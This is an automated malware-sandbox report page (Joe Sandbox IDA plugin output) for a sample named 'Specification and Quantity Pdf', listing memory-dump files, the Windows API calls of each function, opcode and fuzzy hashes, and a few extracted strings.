Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: SwitchThread$BreakDebug
String ID:
API String ID: 223621376-0
Opcode ID: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
Instruction ID: 03985370734362846288778a995164e05e20f4f5d69bcbcf97f87338eae9e695
Opcode Fuzzy Hash: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
Instruction Fuzzy Hash: B1B2BB33A3C64685EAE4AB65A8403B8B7A4EF45795F984236DD5D273E1DF3CE490C320

Function 00007FF773C8F960 Relevance: 10.9, APIs: 7, Instructions: 416COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF773C8D0E0: EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF773C8AE19,?,?,?,00007FF773C7CA43), ref: 00007FF773C8D139
Part of subcall function 00007FF773C8D0E0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF773C8AE19,?,?,?,00007FF773C7CA43), ref: 00007FF773C8D14F

DebugBreak.KERNEL32 ref: 00007FF773C8FE1E
DebugBreak.KERNEL32 ref: 00007FF773C8FE36
DebugBreak.KERNEL32 ref: 00007FF773C8FE4E
DebugBreak.KERNEL32 ref: 00007FF773C8FE6C
DebugBreak.KERNEL32 ref: 00007FF773C8FE8C
DebugBreak.KERNEL32 ref: 00007FF773C8FEA0
DebugBreak.KERNEL32 ref: 00007FF773C8FF51

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug$CriticalSection$EnterLeave
String ID:
API String ID: 3888577265-0
Opcode ID: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
Instruction ID: 1b94b4ff996961deb512bcab3cad0be3ff45cc4c58636866afef564fd9e231f4
Opcode Fuzzy Hash: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
Instruction Fuzzy Hash: 55129033A3E74681EAE1AB55A4403B9B7A8FF94B88F944136CA4D273D5DF3CE550C260

Function 00007FF773C8A7B0 Relevance: 10.9, APIs: 7, Instructions: 376COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF773C892AB), ref: 00007FF773C8A909
EnterCriticalSection.KERNEL32 ref: 00007FF773C8AC36
LeaveCriticalSection.KERNEL32 ref: 00007FF773C8AC50
DebugBreak.KERNEL32 ref: 00007FF773C8ACFD
DebugBreak.KERNEL32 ref: 00007FF773C8AD1A
DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF773C892AB), ref: 00007FF773C8AD35
DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF773C892AB), ref: 00007FF773C8AD4E

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug$CriticalSection$EnterLeave
String ID:
API String ID: 3888577265-0
Opcode ID: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
Instruction ID: d1095343220137f663f7e83084366b6974661b1c1bbbab5904e51afb4fd3dbc3
Opcode Fuzzy Hash: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
Instruction Fuzzy Hash: 1F029077A3D68286EBD4AB6595403B8B7A1FB44B84F984136CA4D237E1DF3CE561C320

Function 00007FF773C56A50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56B07
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56C51
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56D33
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56D49
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56DBE

Strings

[ KeepUnwinding ], xrefs: 00007FF773C56D5D

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: [ KeepUnwinding ]
API String ID: 2546344036-400895726
Opcode ID: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
Instruction ID: 06a5d3b04d4b6476a169ed3c1c8e96fa2853bec2f8873e5ea305ce71101586fd
Opcode Fuzzy Hash: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
Instruction Fuzzy Hash: 2CB14B33629B4181EBD0AF25D4416B9B3A5FB45B48FA85136CE4D273D8CF39E465C320

Function 00007FF773CBB27C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF773CBB2A8
GetCurrentThreadId.KERNEL32 ref: 00007FF773CBB2B6
GetCurrentProcessId.KERNEL32 ref: 00007FF773CBB2C2
QueryPerformanceCounter.KERNEL32 ref: 00007FF773CBB2D2

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
Instruction ID: 46d7dfc9cd4e7b33c369718146b0749c15727cabb71653e3e221ed4c98afcfdf
Opcode Fuzzy Hash: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
Instruction Fuzzy Hash: 0F115E22B38F058AEB40DFA0E8442B873A4FB59758F840E31EAAD527A4DF7CD1658350

Function 00007FF773C8D320 Relevance: 3.3, APIs: 2, Instructions: 326threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF773C8D465
SwitchToThread.KERNEL32 ref: 00007FF773C8D495

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
Instruction ID: 8c2215ac9532ee565fdd673ed3bb5d4ff4fb823a9e7fc9ad27393431dce2c2ef
Opcode Fuzzy Hash: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
Instruction Fuzzy Hash: 34D19E33A3868585EBA0AF15D4046AAF3A1FB85B94F844536DA9D637CCDF3CE540C720

Function 00007FF773C7B6B0 Relevance: 3.3, APIs: 2, Instructions: 303COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF773C7B9D2
DebugBreak.KERNEL32 ref: 00007FF773C7B9E3

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
Instruction ID: d46fb13b92764f7214f0ab656044ad5d81c07f1aa5b91fd78c6fdc700a162180
Opcode Fuzzy Hash: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
Instruction Fuzzy Hash: 9AE1C033A39A8685EB90AF69D844278B7A4EF10B95F900236DD5D277E4DF3CE451C360

Function 00007FF773C94A40 Relevance: 3.2, APIs: 2, Instructions: 171COMMON

Download Yara Rule

APIs

FlushProcessWriteBuffers.KERNEL32 ref: 00007FF773C94A78
FlushProcessWriteBuffers.KERNEL32 ref: 00007FF773C94C8D

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
Instruction ID: 48f1df838f77d748c38f6852aadf25f760cc8777a811f69eca90df6bc7b88447
Opcode Fuzzy Hash: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
Instruction Fuzzy Hash: 69510E93B387D146EEA1EA6464103F9EA90EB517D4F9A8131CE5D6B7D1EE3CD540C310

Function 00007FF773C60470 Relevance: 3.2, APIs: 2, Instructions: 162COMMON

Download Yara Rule

APIs

GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF773C54896,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C60531
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF773C54896,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C60590

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: EnabledFeaturesState
String ID:
API String ID: 1557480591-0
Opcode ID: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
Instruction ID: 0d85291986de6f57a01c37138f858cd8fb101a9da3b7caf90828f9ea68e288c1
Opcode Fuzzy Hash: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
Instruction Fuzzy Hash: 7851CE33E3C62686FFE8645994A937982839BD535CF858538CE4E732C2CD7ED8428225

Function 00007FF773C58220 Relevance: 2.1, Strings: 1, Instructions: 834COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF773C582EE

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
Instruction ID: 6668541d9ed449ea2bc830f55623bdeb902b43501af480014eb0c0c71549c78c
Opcode Fuzzy Hash: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
Instruction Fuzzy Hash: 6962C0B3B25B0687EB489F28C55177976A5FB94B88FA58036CA0E537D8DF38D910C780

Function 00007FF773C7FDD0 Relevance: 1.9, APIs: 1, Instructions: 439COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF773C60C50: CreateEventW.KERNEL32 ref: 00007FF773C60C91

Part of subcall function 00007FF773C61630: QueryPerformanceCounter.KERNEL32 ref: 00007FF773C61639

DebugBreak.KERNEL32 ref: 00007FF773C8058A

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakCounterCreateDebugEventPerformanceQuery
String ID:
API String ID: 4239280443-0
Opcode ID: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
Instruction ID: 9db2ee04fa9f551a0ab31fd996578e9e3c116d6d7e9e3e5a2412c6f2f66d31d9
Opcode Fuzzy Hash: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
Instruction Fuzzy Hash: 50420A33D3DB4285E791ABA4B880274B3A4FF59744F94923AD98C32765DF3CA1A1D360

Function 00007FF773D17BA0 Relevance: 1.8, APIs: 1, Instructions: 347COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 00007FF773D17E0D

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: d5b68029aa416122ce9160fa44b138e07519b76c0a8e0ce365ee1a4a9db7f319
Instruction ID: 8e41631b5ecd73e6c04abd1b42b06ad42c3d84d0581dd8c6a239e4295e4d0189
Opcode Fuzzy Hash: d5b68029aa416122ce9160fa44b138e07519b76c0a8e0ce365ee1a4a9db7f319
Instruction Fuzzy Hash: CAD1B333A3C64686F794ABA1D44467DA3A1BB40788F924835DE0E676A5DF38E881C760

Function 00007FF773C835C0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON

Download Yara Rule

Strings

, xrefs: 00007FF773C83B1C

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
Instruction ID: a15e8d22e8cbe98c6f0f4f8060acf224ca9fbce388da292b7e356ec92382e268
Opcode Fuzzy Hash: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
Instruction Fuzzy Hash: 2342B637A3DA4685EA91AF59E8406B9B7A1FF017A0F845232C96D637D4CF3DE560C320

Function 00007FF773C79A50 Relevance: 1.7, Strings: 1, Instructions: 490COMMON

Download Yara Rule

Strings

========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF773C7A256

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
API String ID: 0-2256439813
Opcode ID: 3d9c7d8b7c0ab8532314e1187208e6530c88a17523e66e958ad062fb87e6edbc
Instruction ID: bc65366adb3ebdccd13ccb2c89b9efd3b08d34f1e8d4ce8b997b4b49902544ef
Opcode Fuzzy Hash: 3d9c7d8b7c0ab8532314e1187208e6530c88a17523e66e958ad062fb87e6edbc
Instruction Fuzzy Hash: F7429F33A3DB8686EA95AB68D840378B7A5FF05744F944136CA8D273A1DF3DE065C360

Function 00007FF773C6E8A0 Relevance: 1.7, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF773C6E8EB

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
Instruction ID: 1ab80c8e4c6f2eed879afa81dcca621aa4f64c2576f2e8f3a21f9802604ada47
Opcode Fuzzy Hash: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
Instruction Fuzzy Hash: DD12BE33A38A42C2EA90EB25E5446B9B3A5FB85B98F944232DA5D237D4DF3DE051C710

Function 00007FF773C744D0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

, xrefs: 00007FF773C74713

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
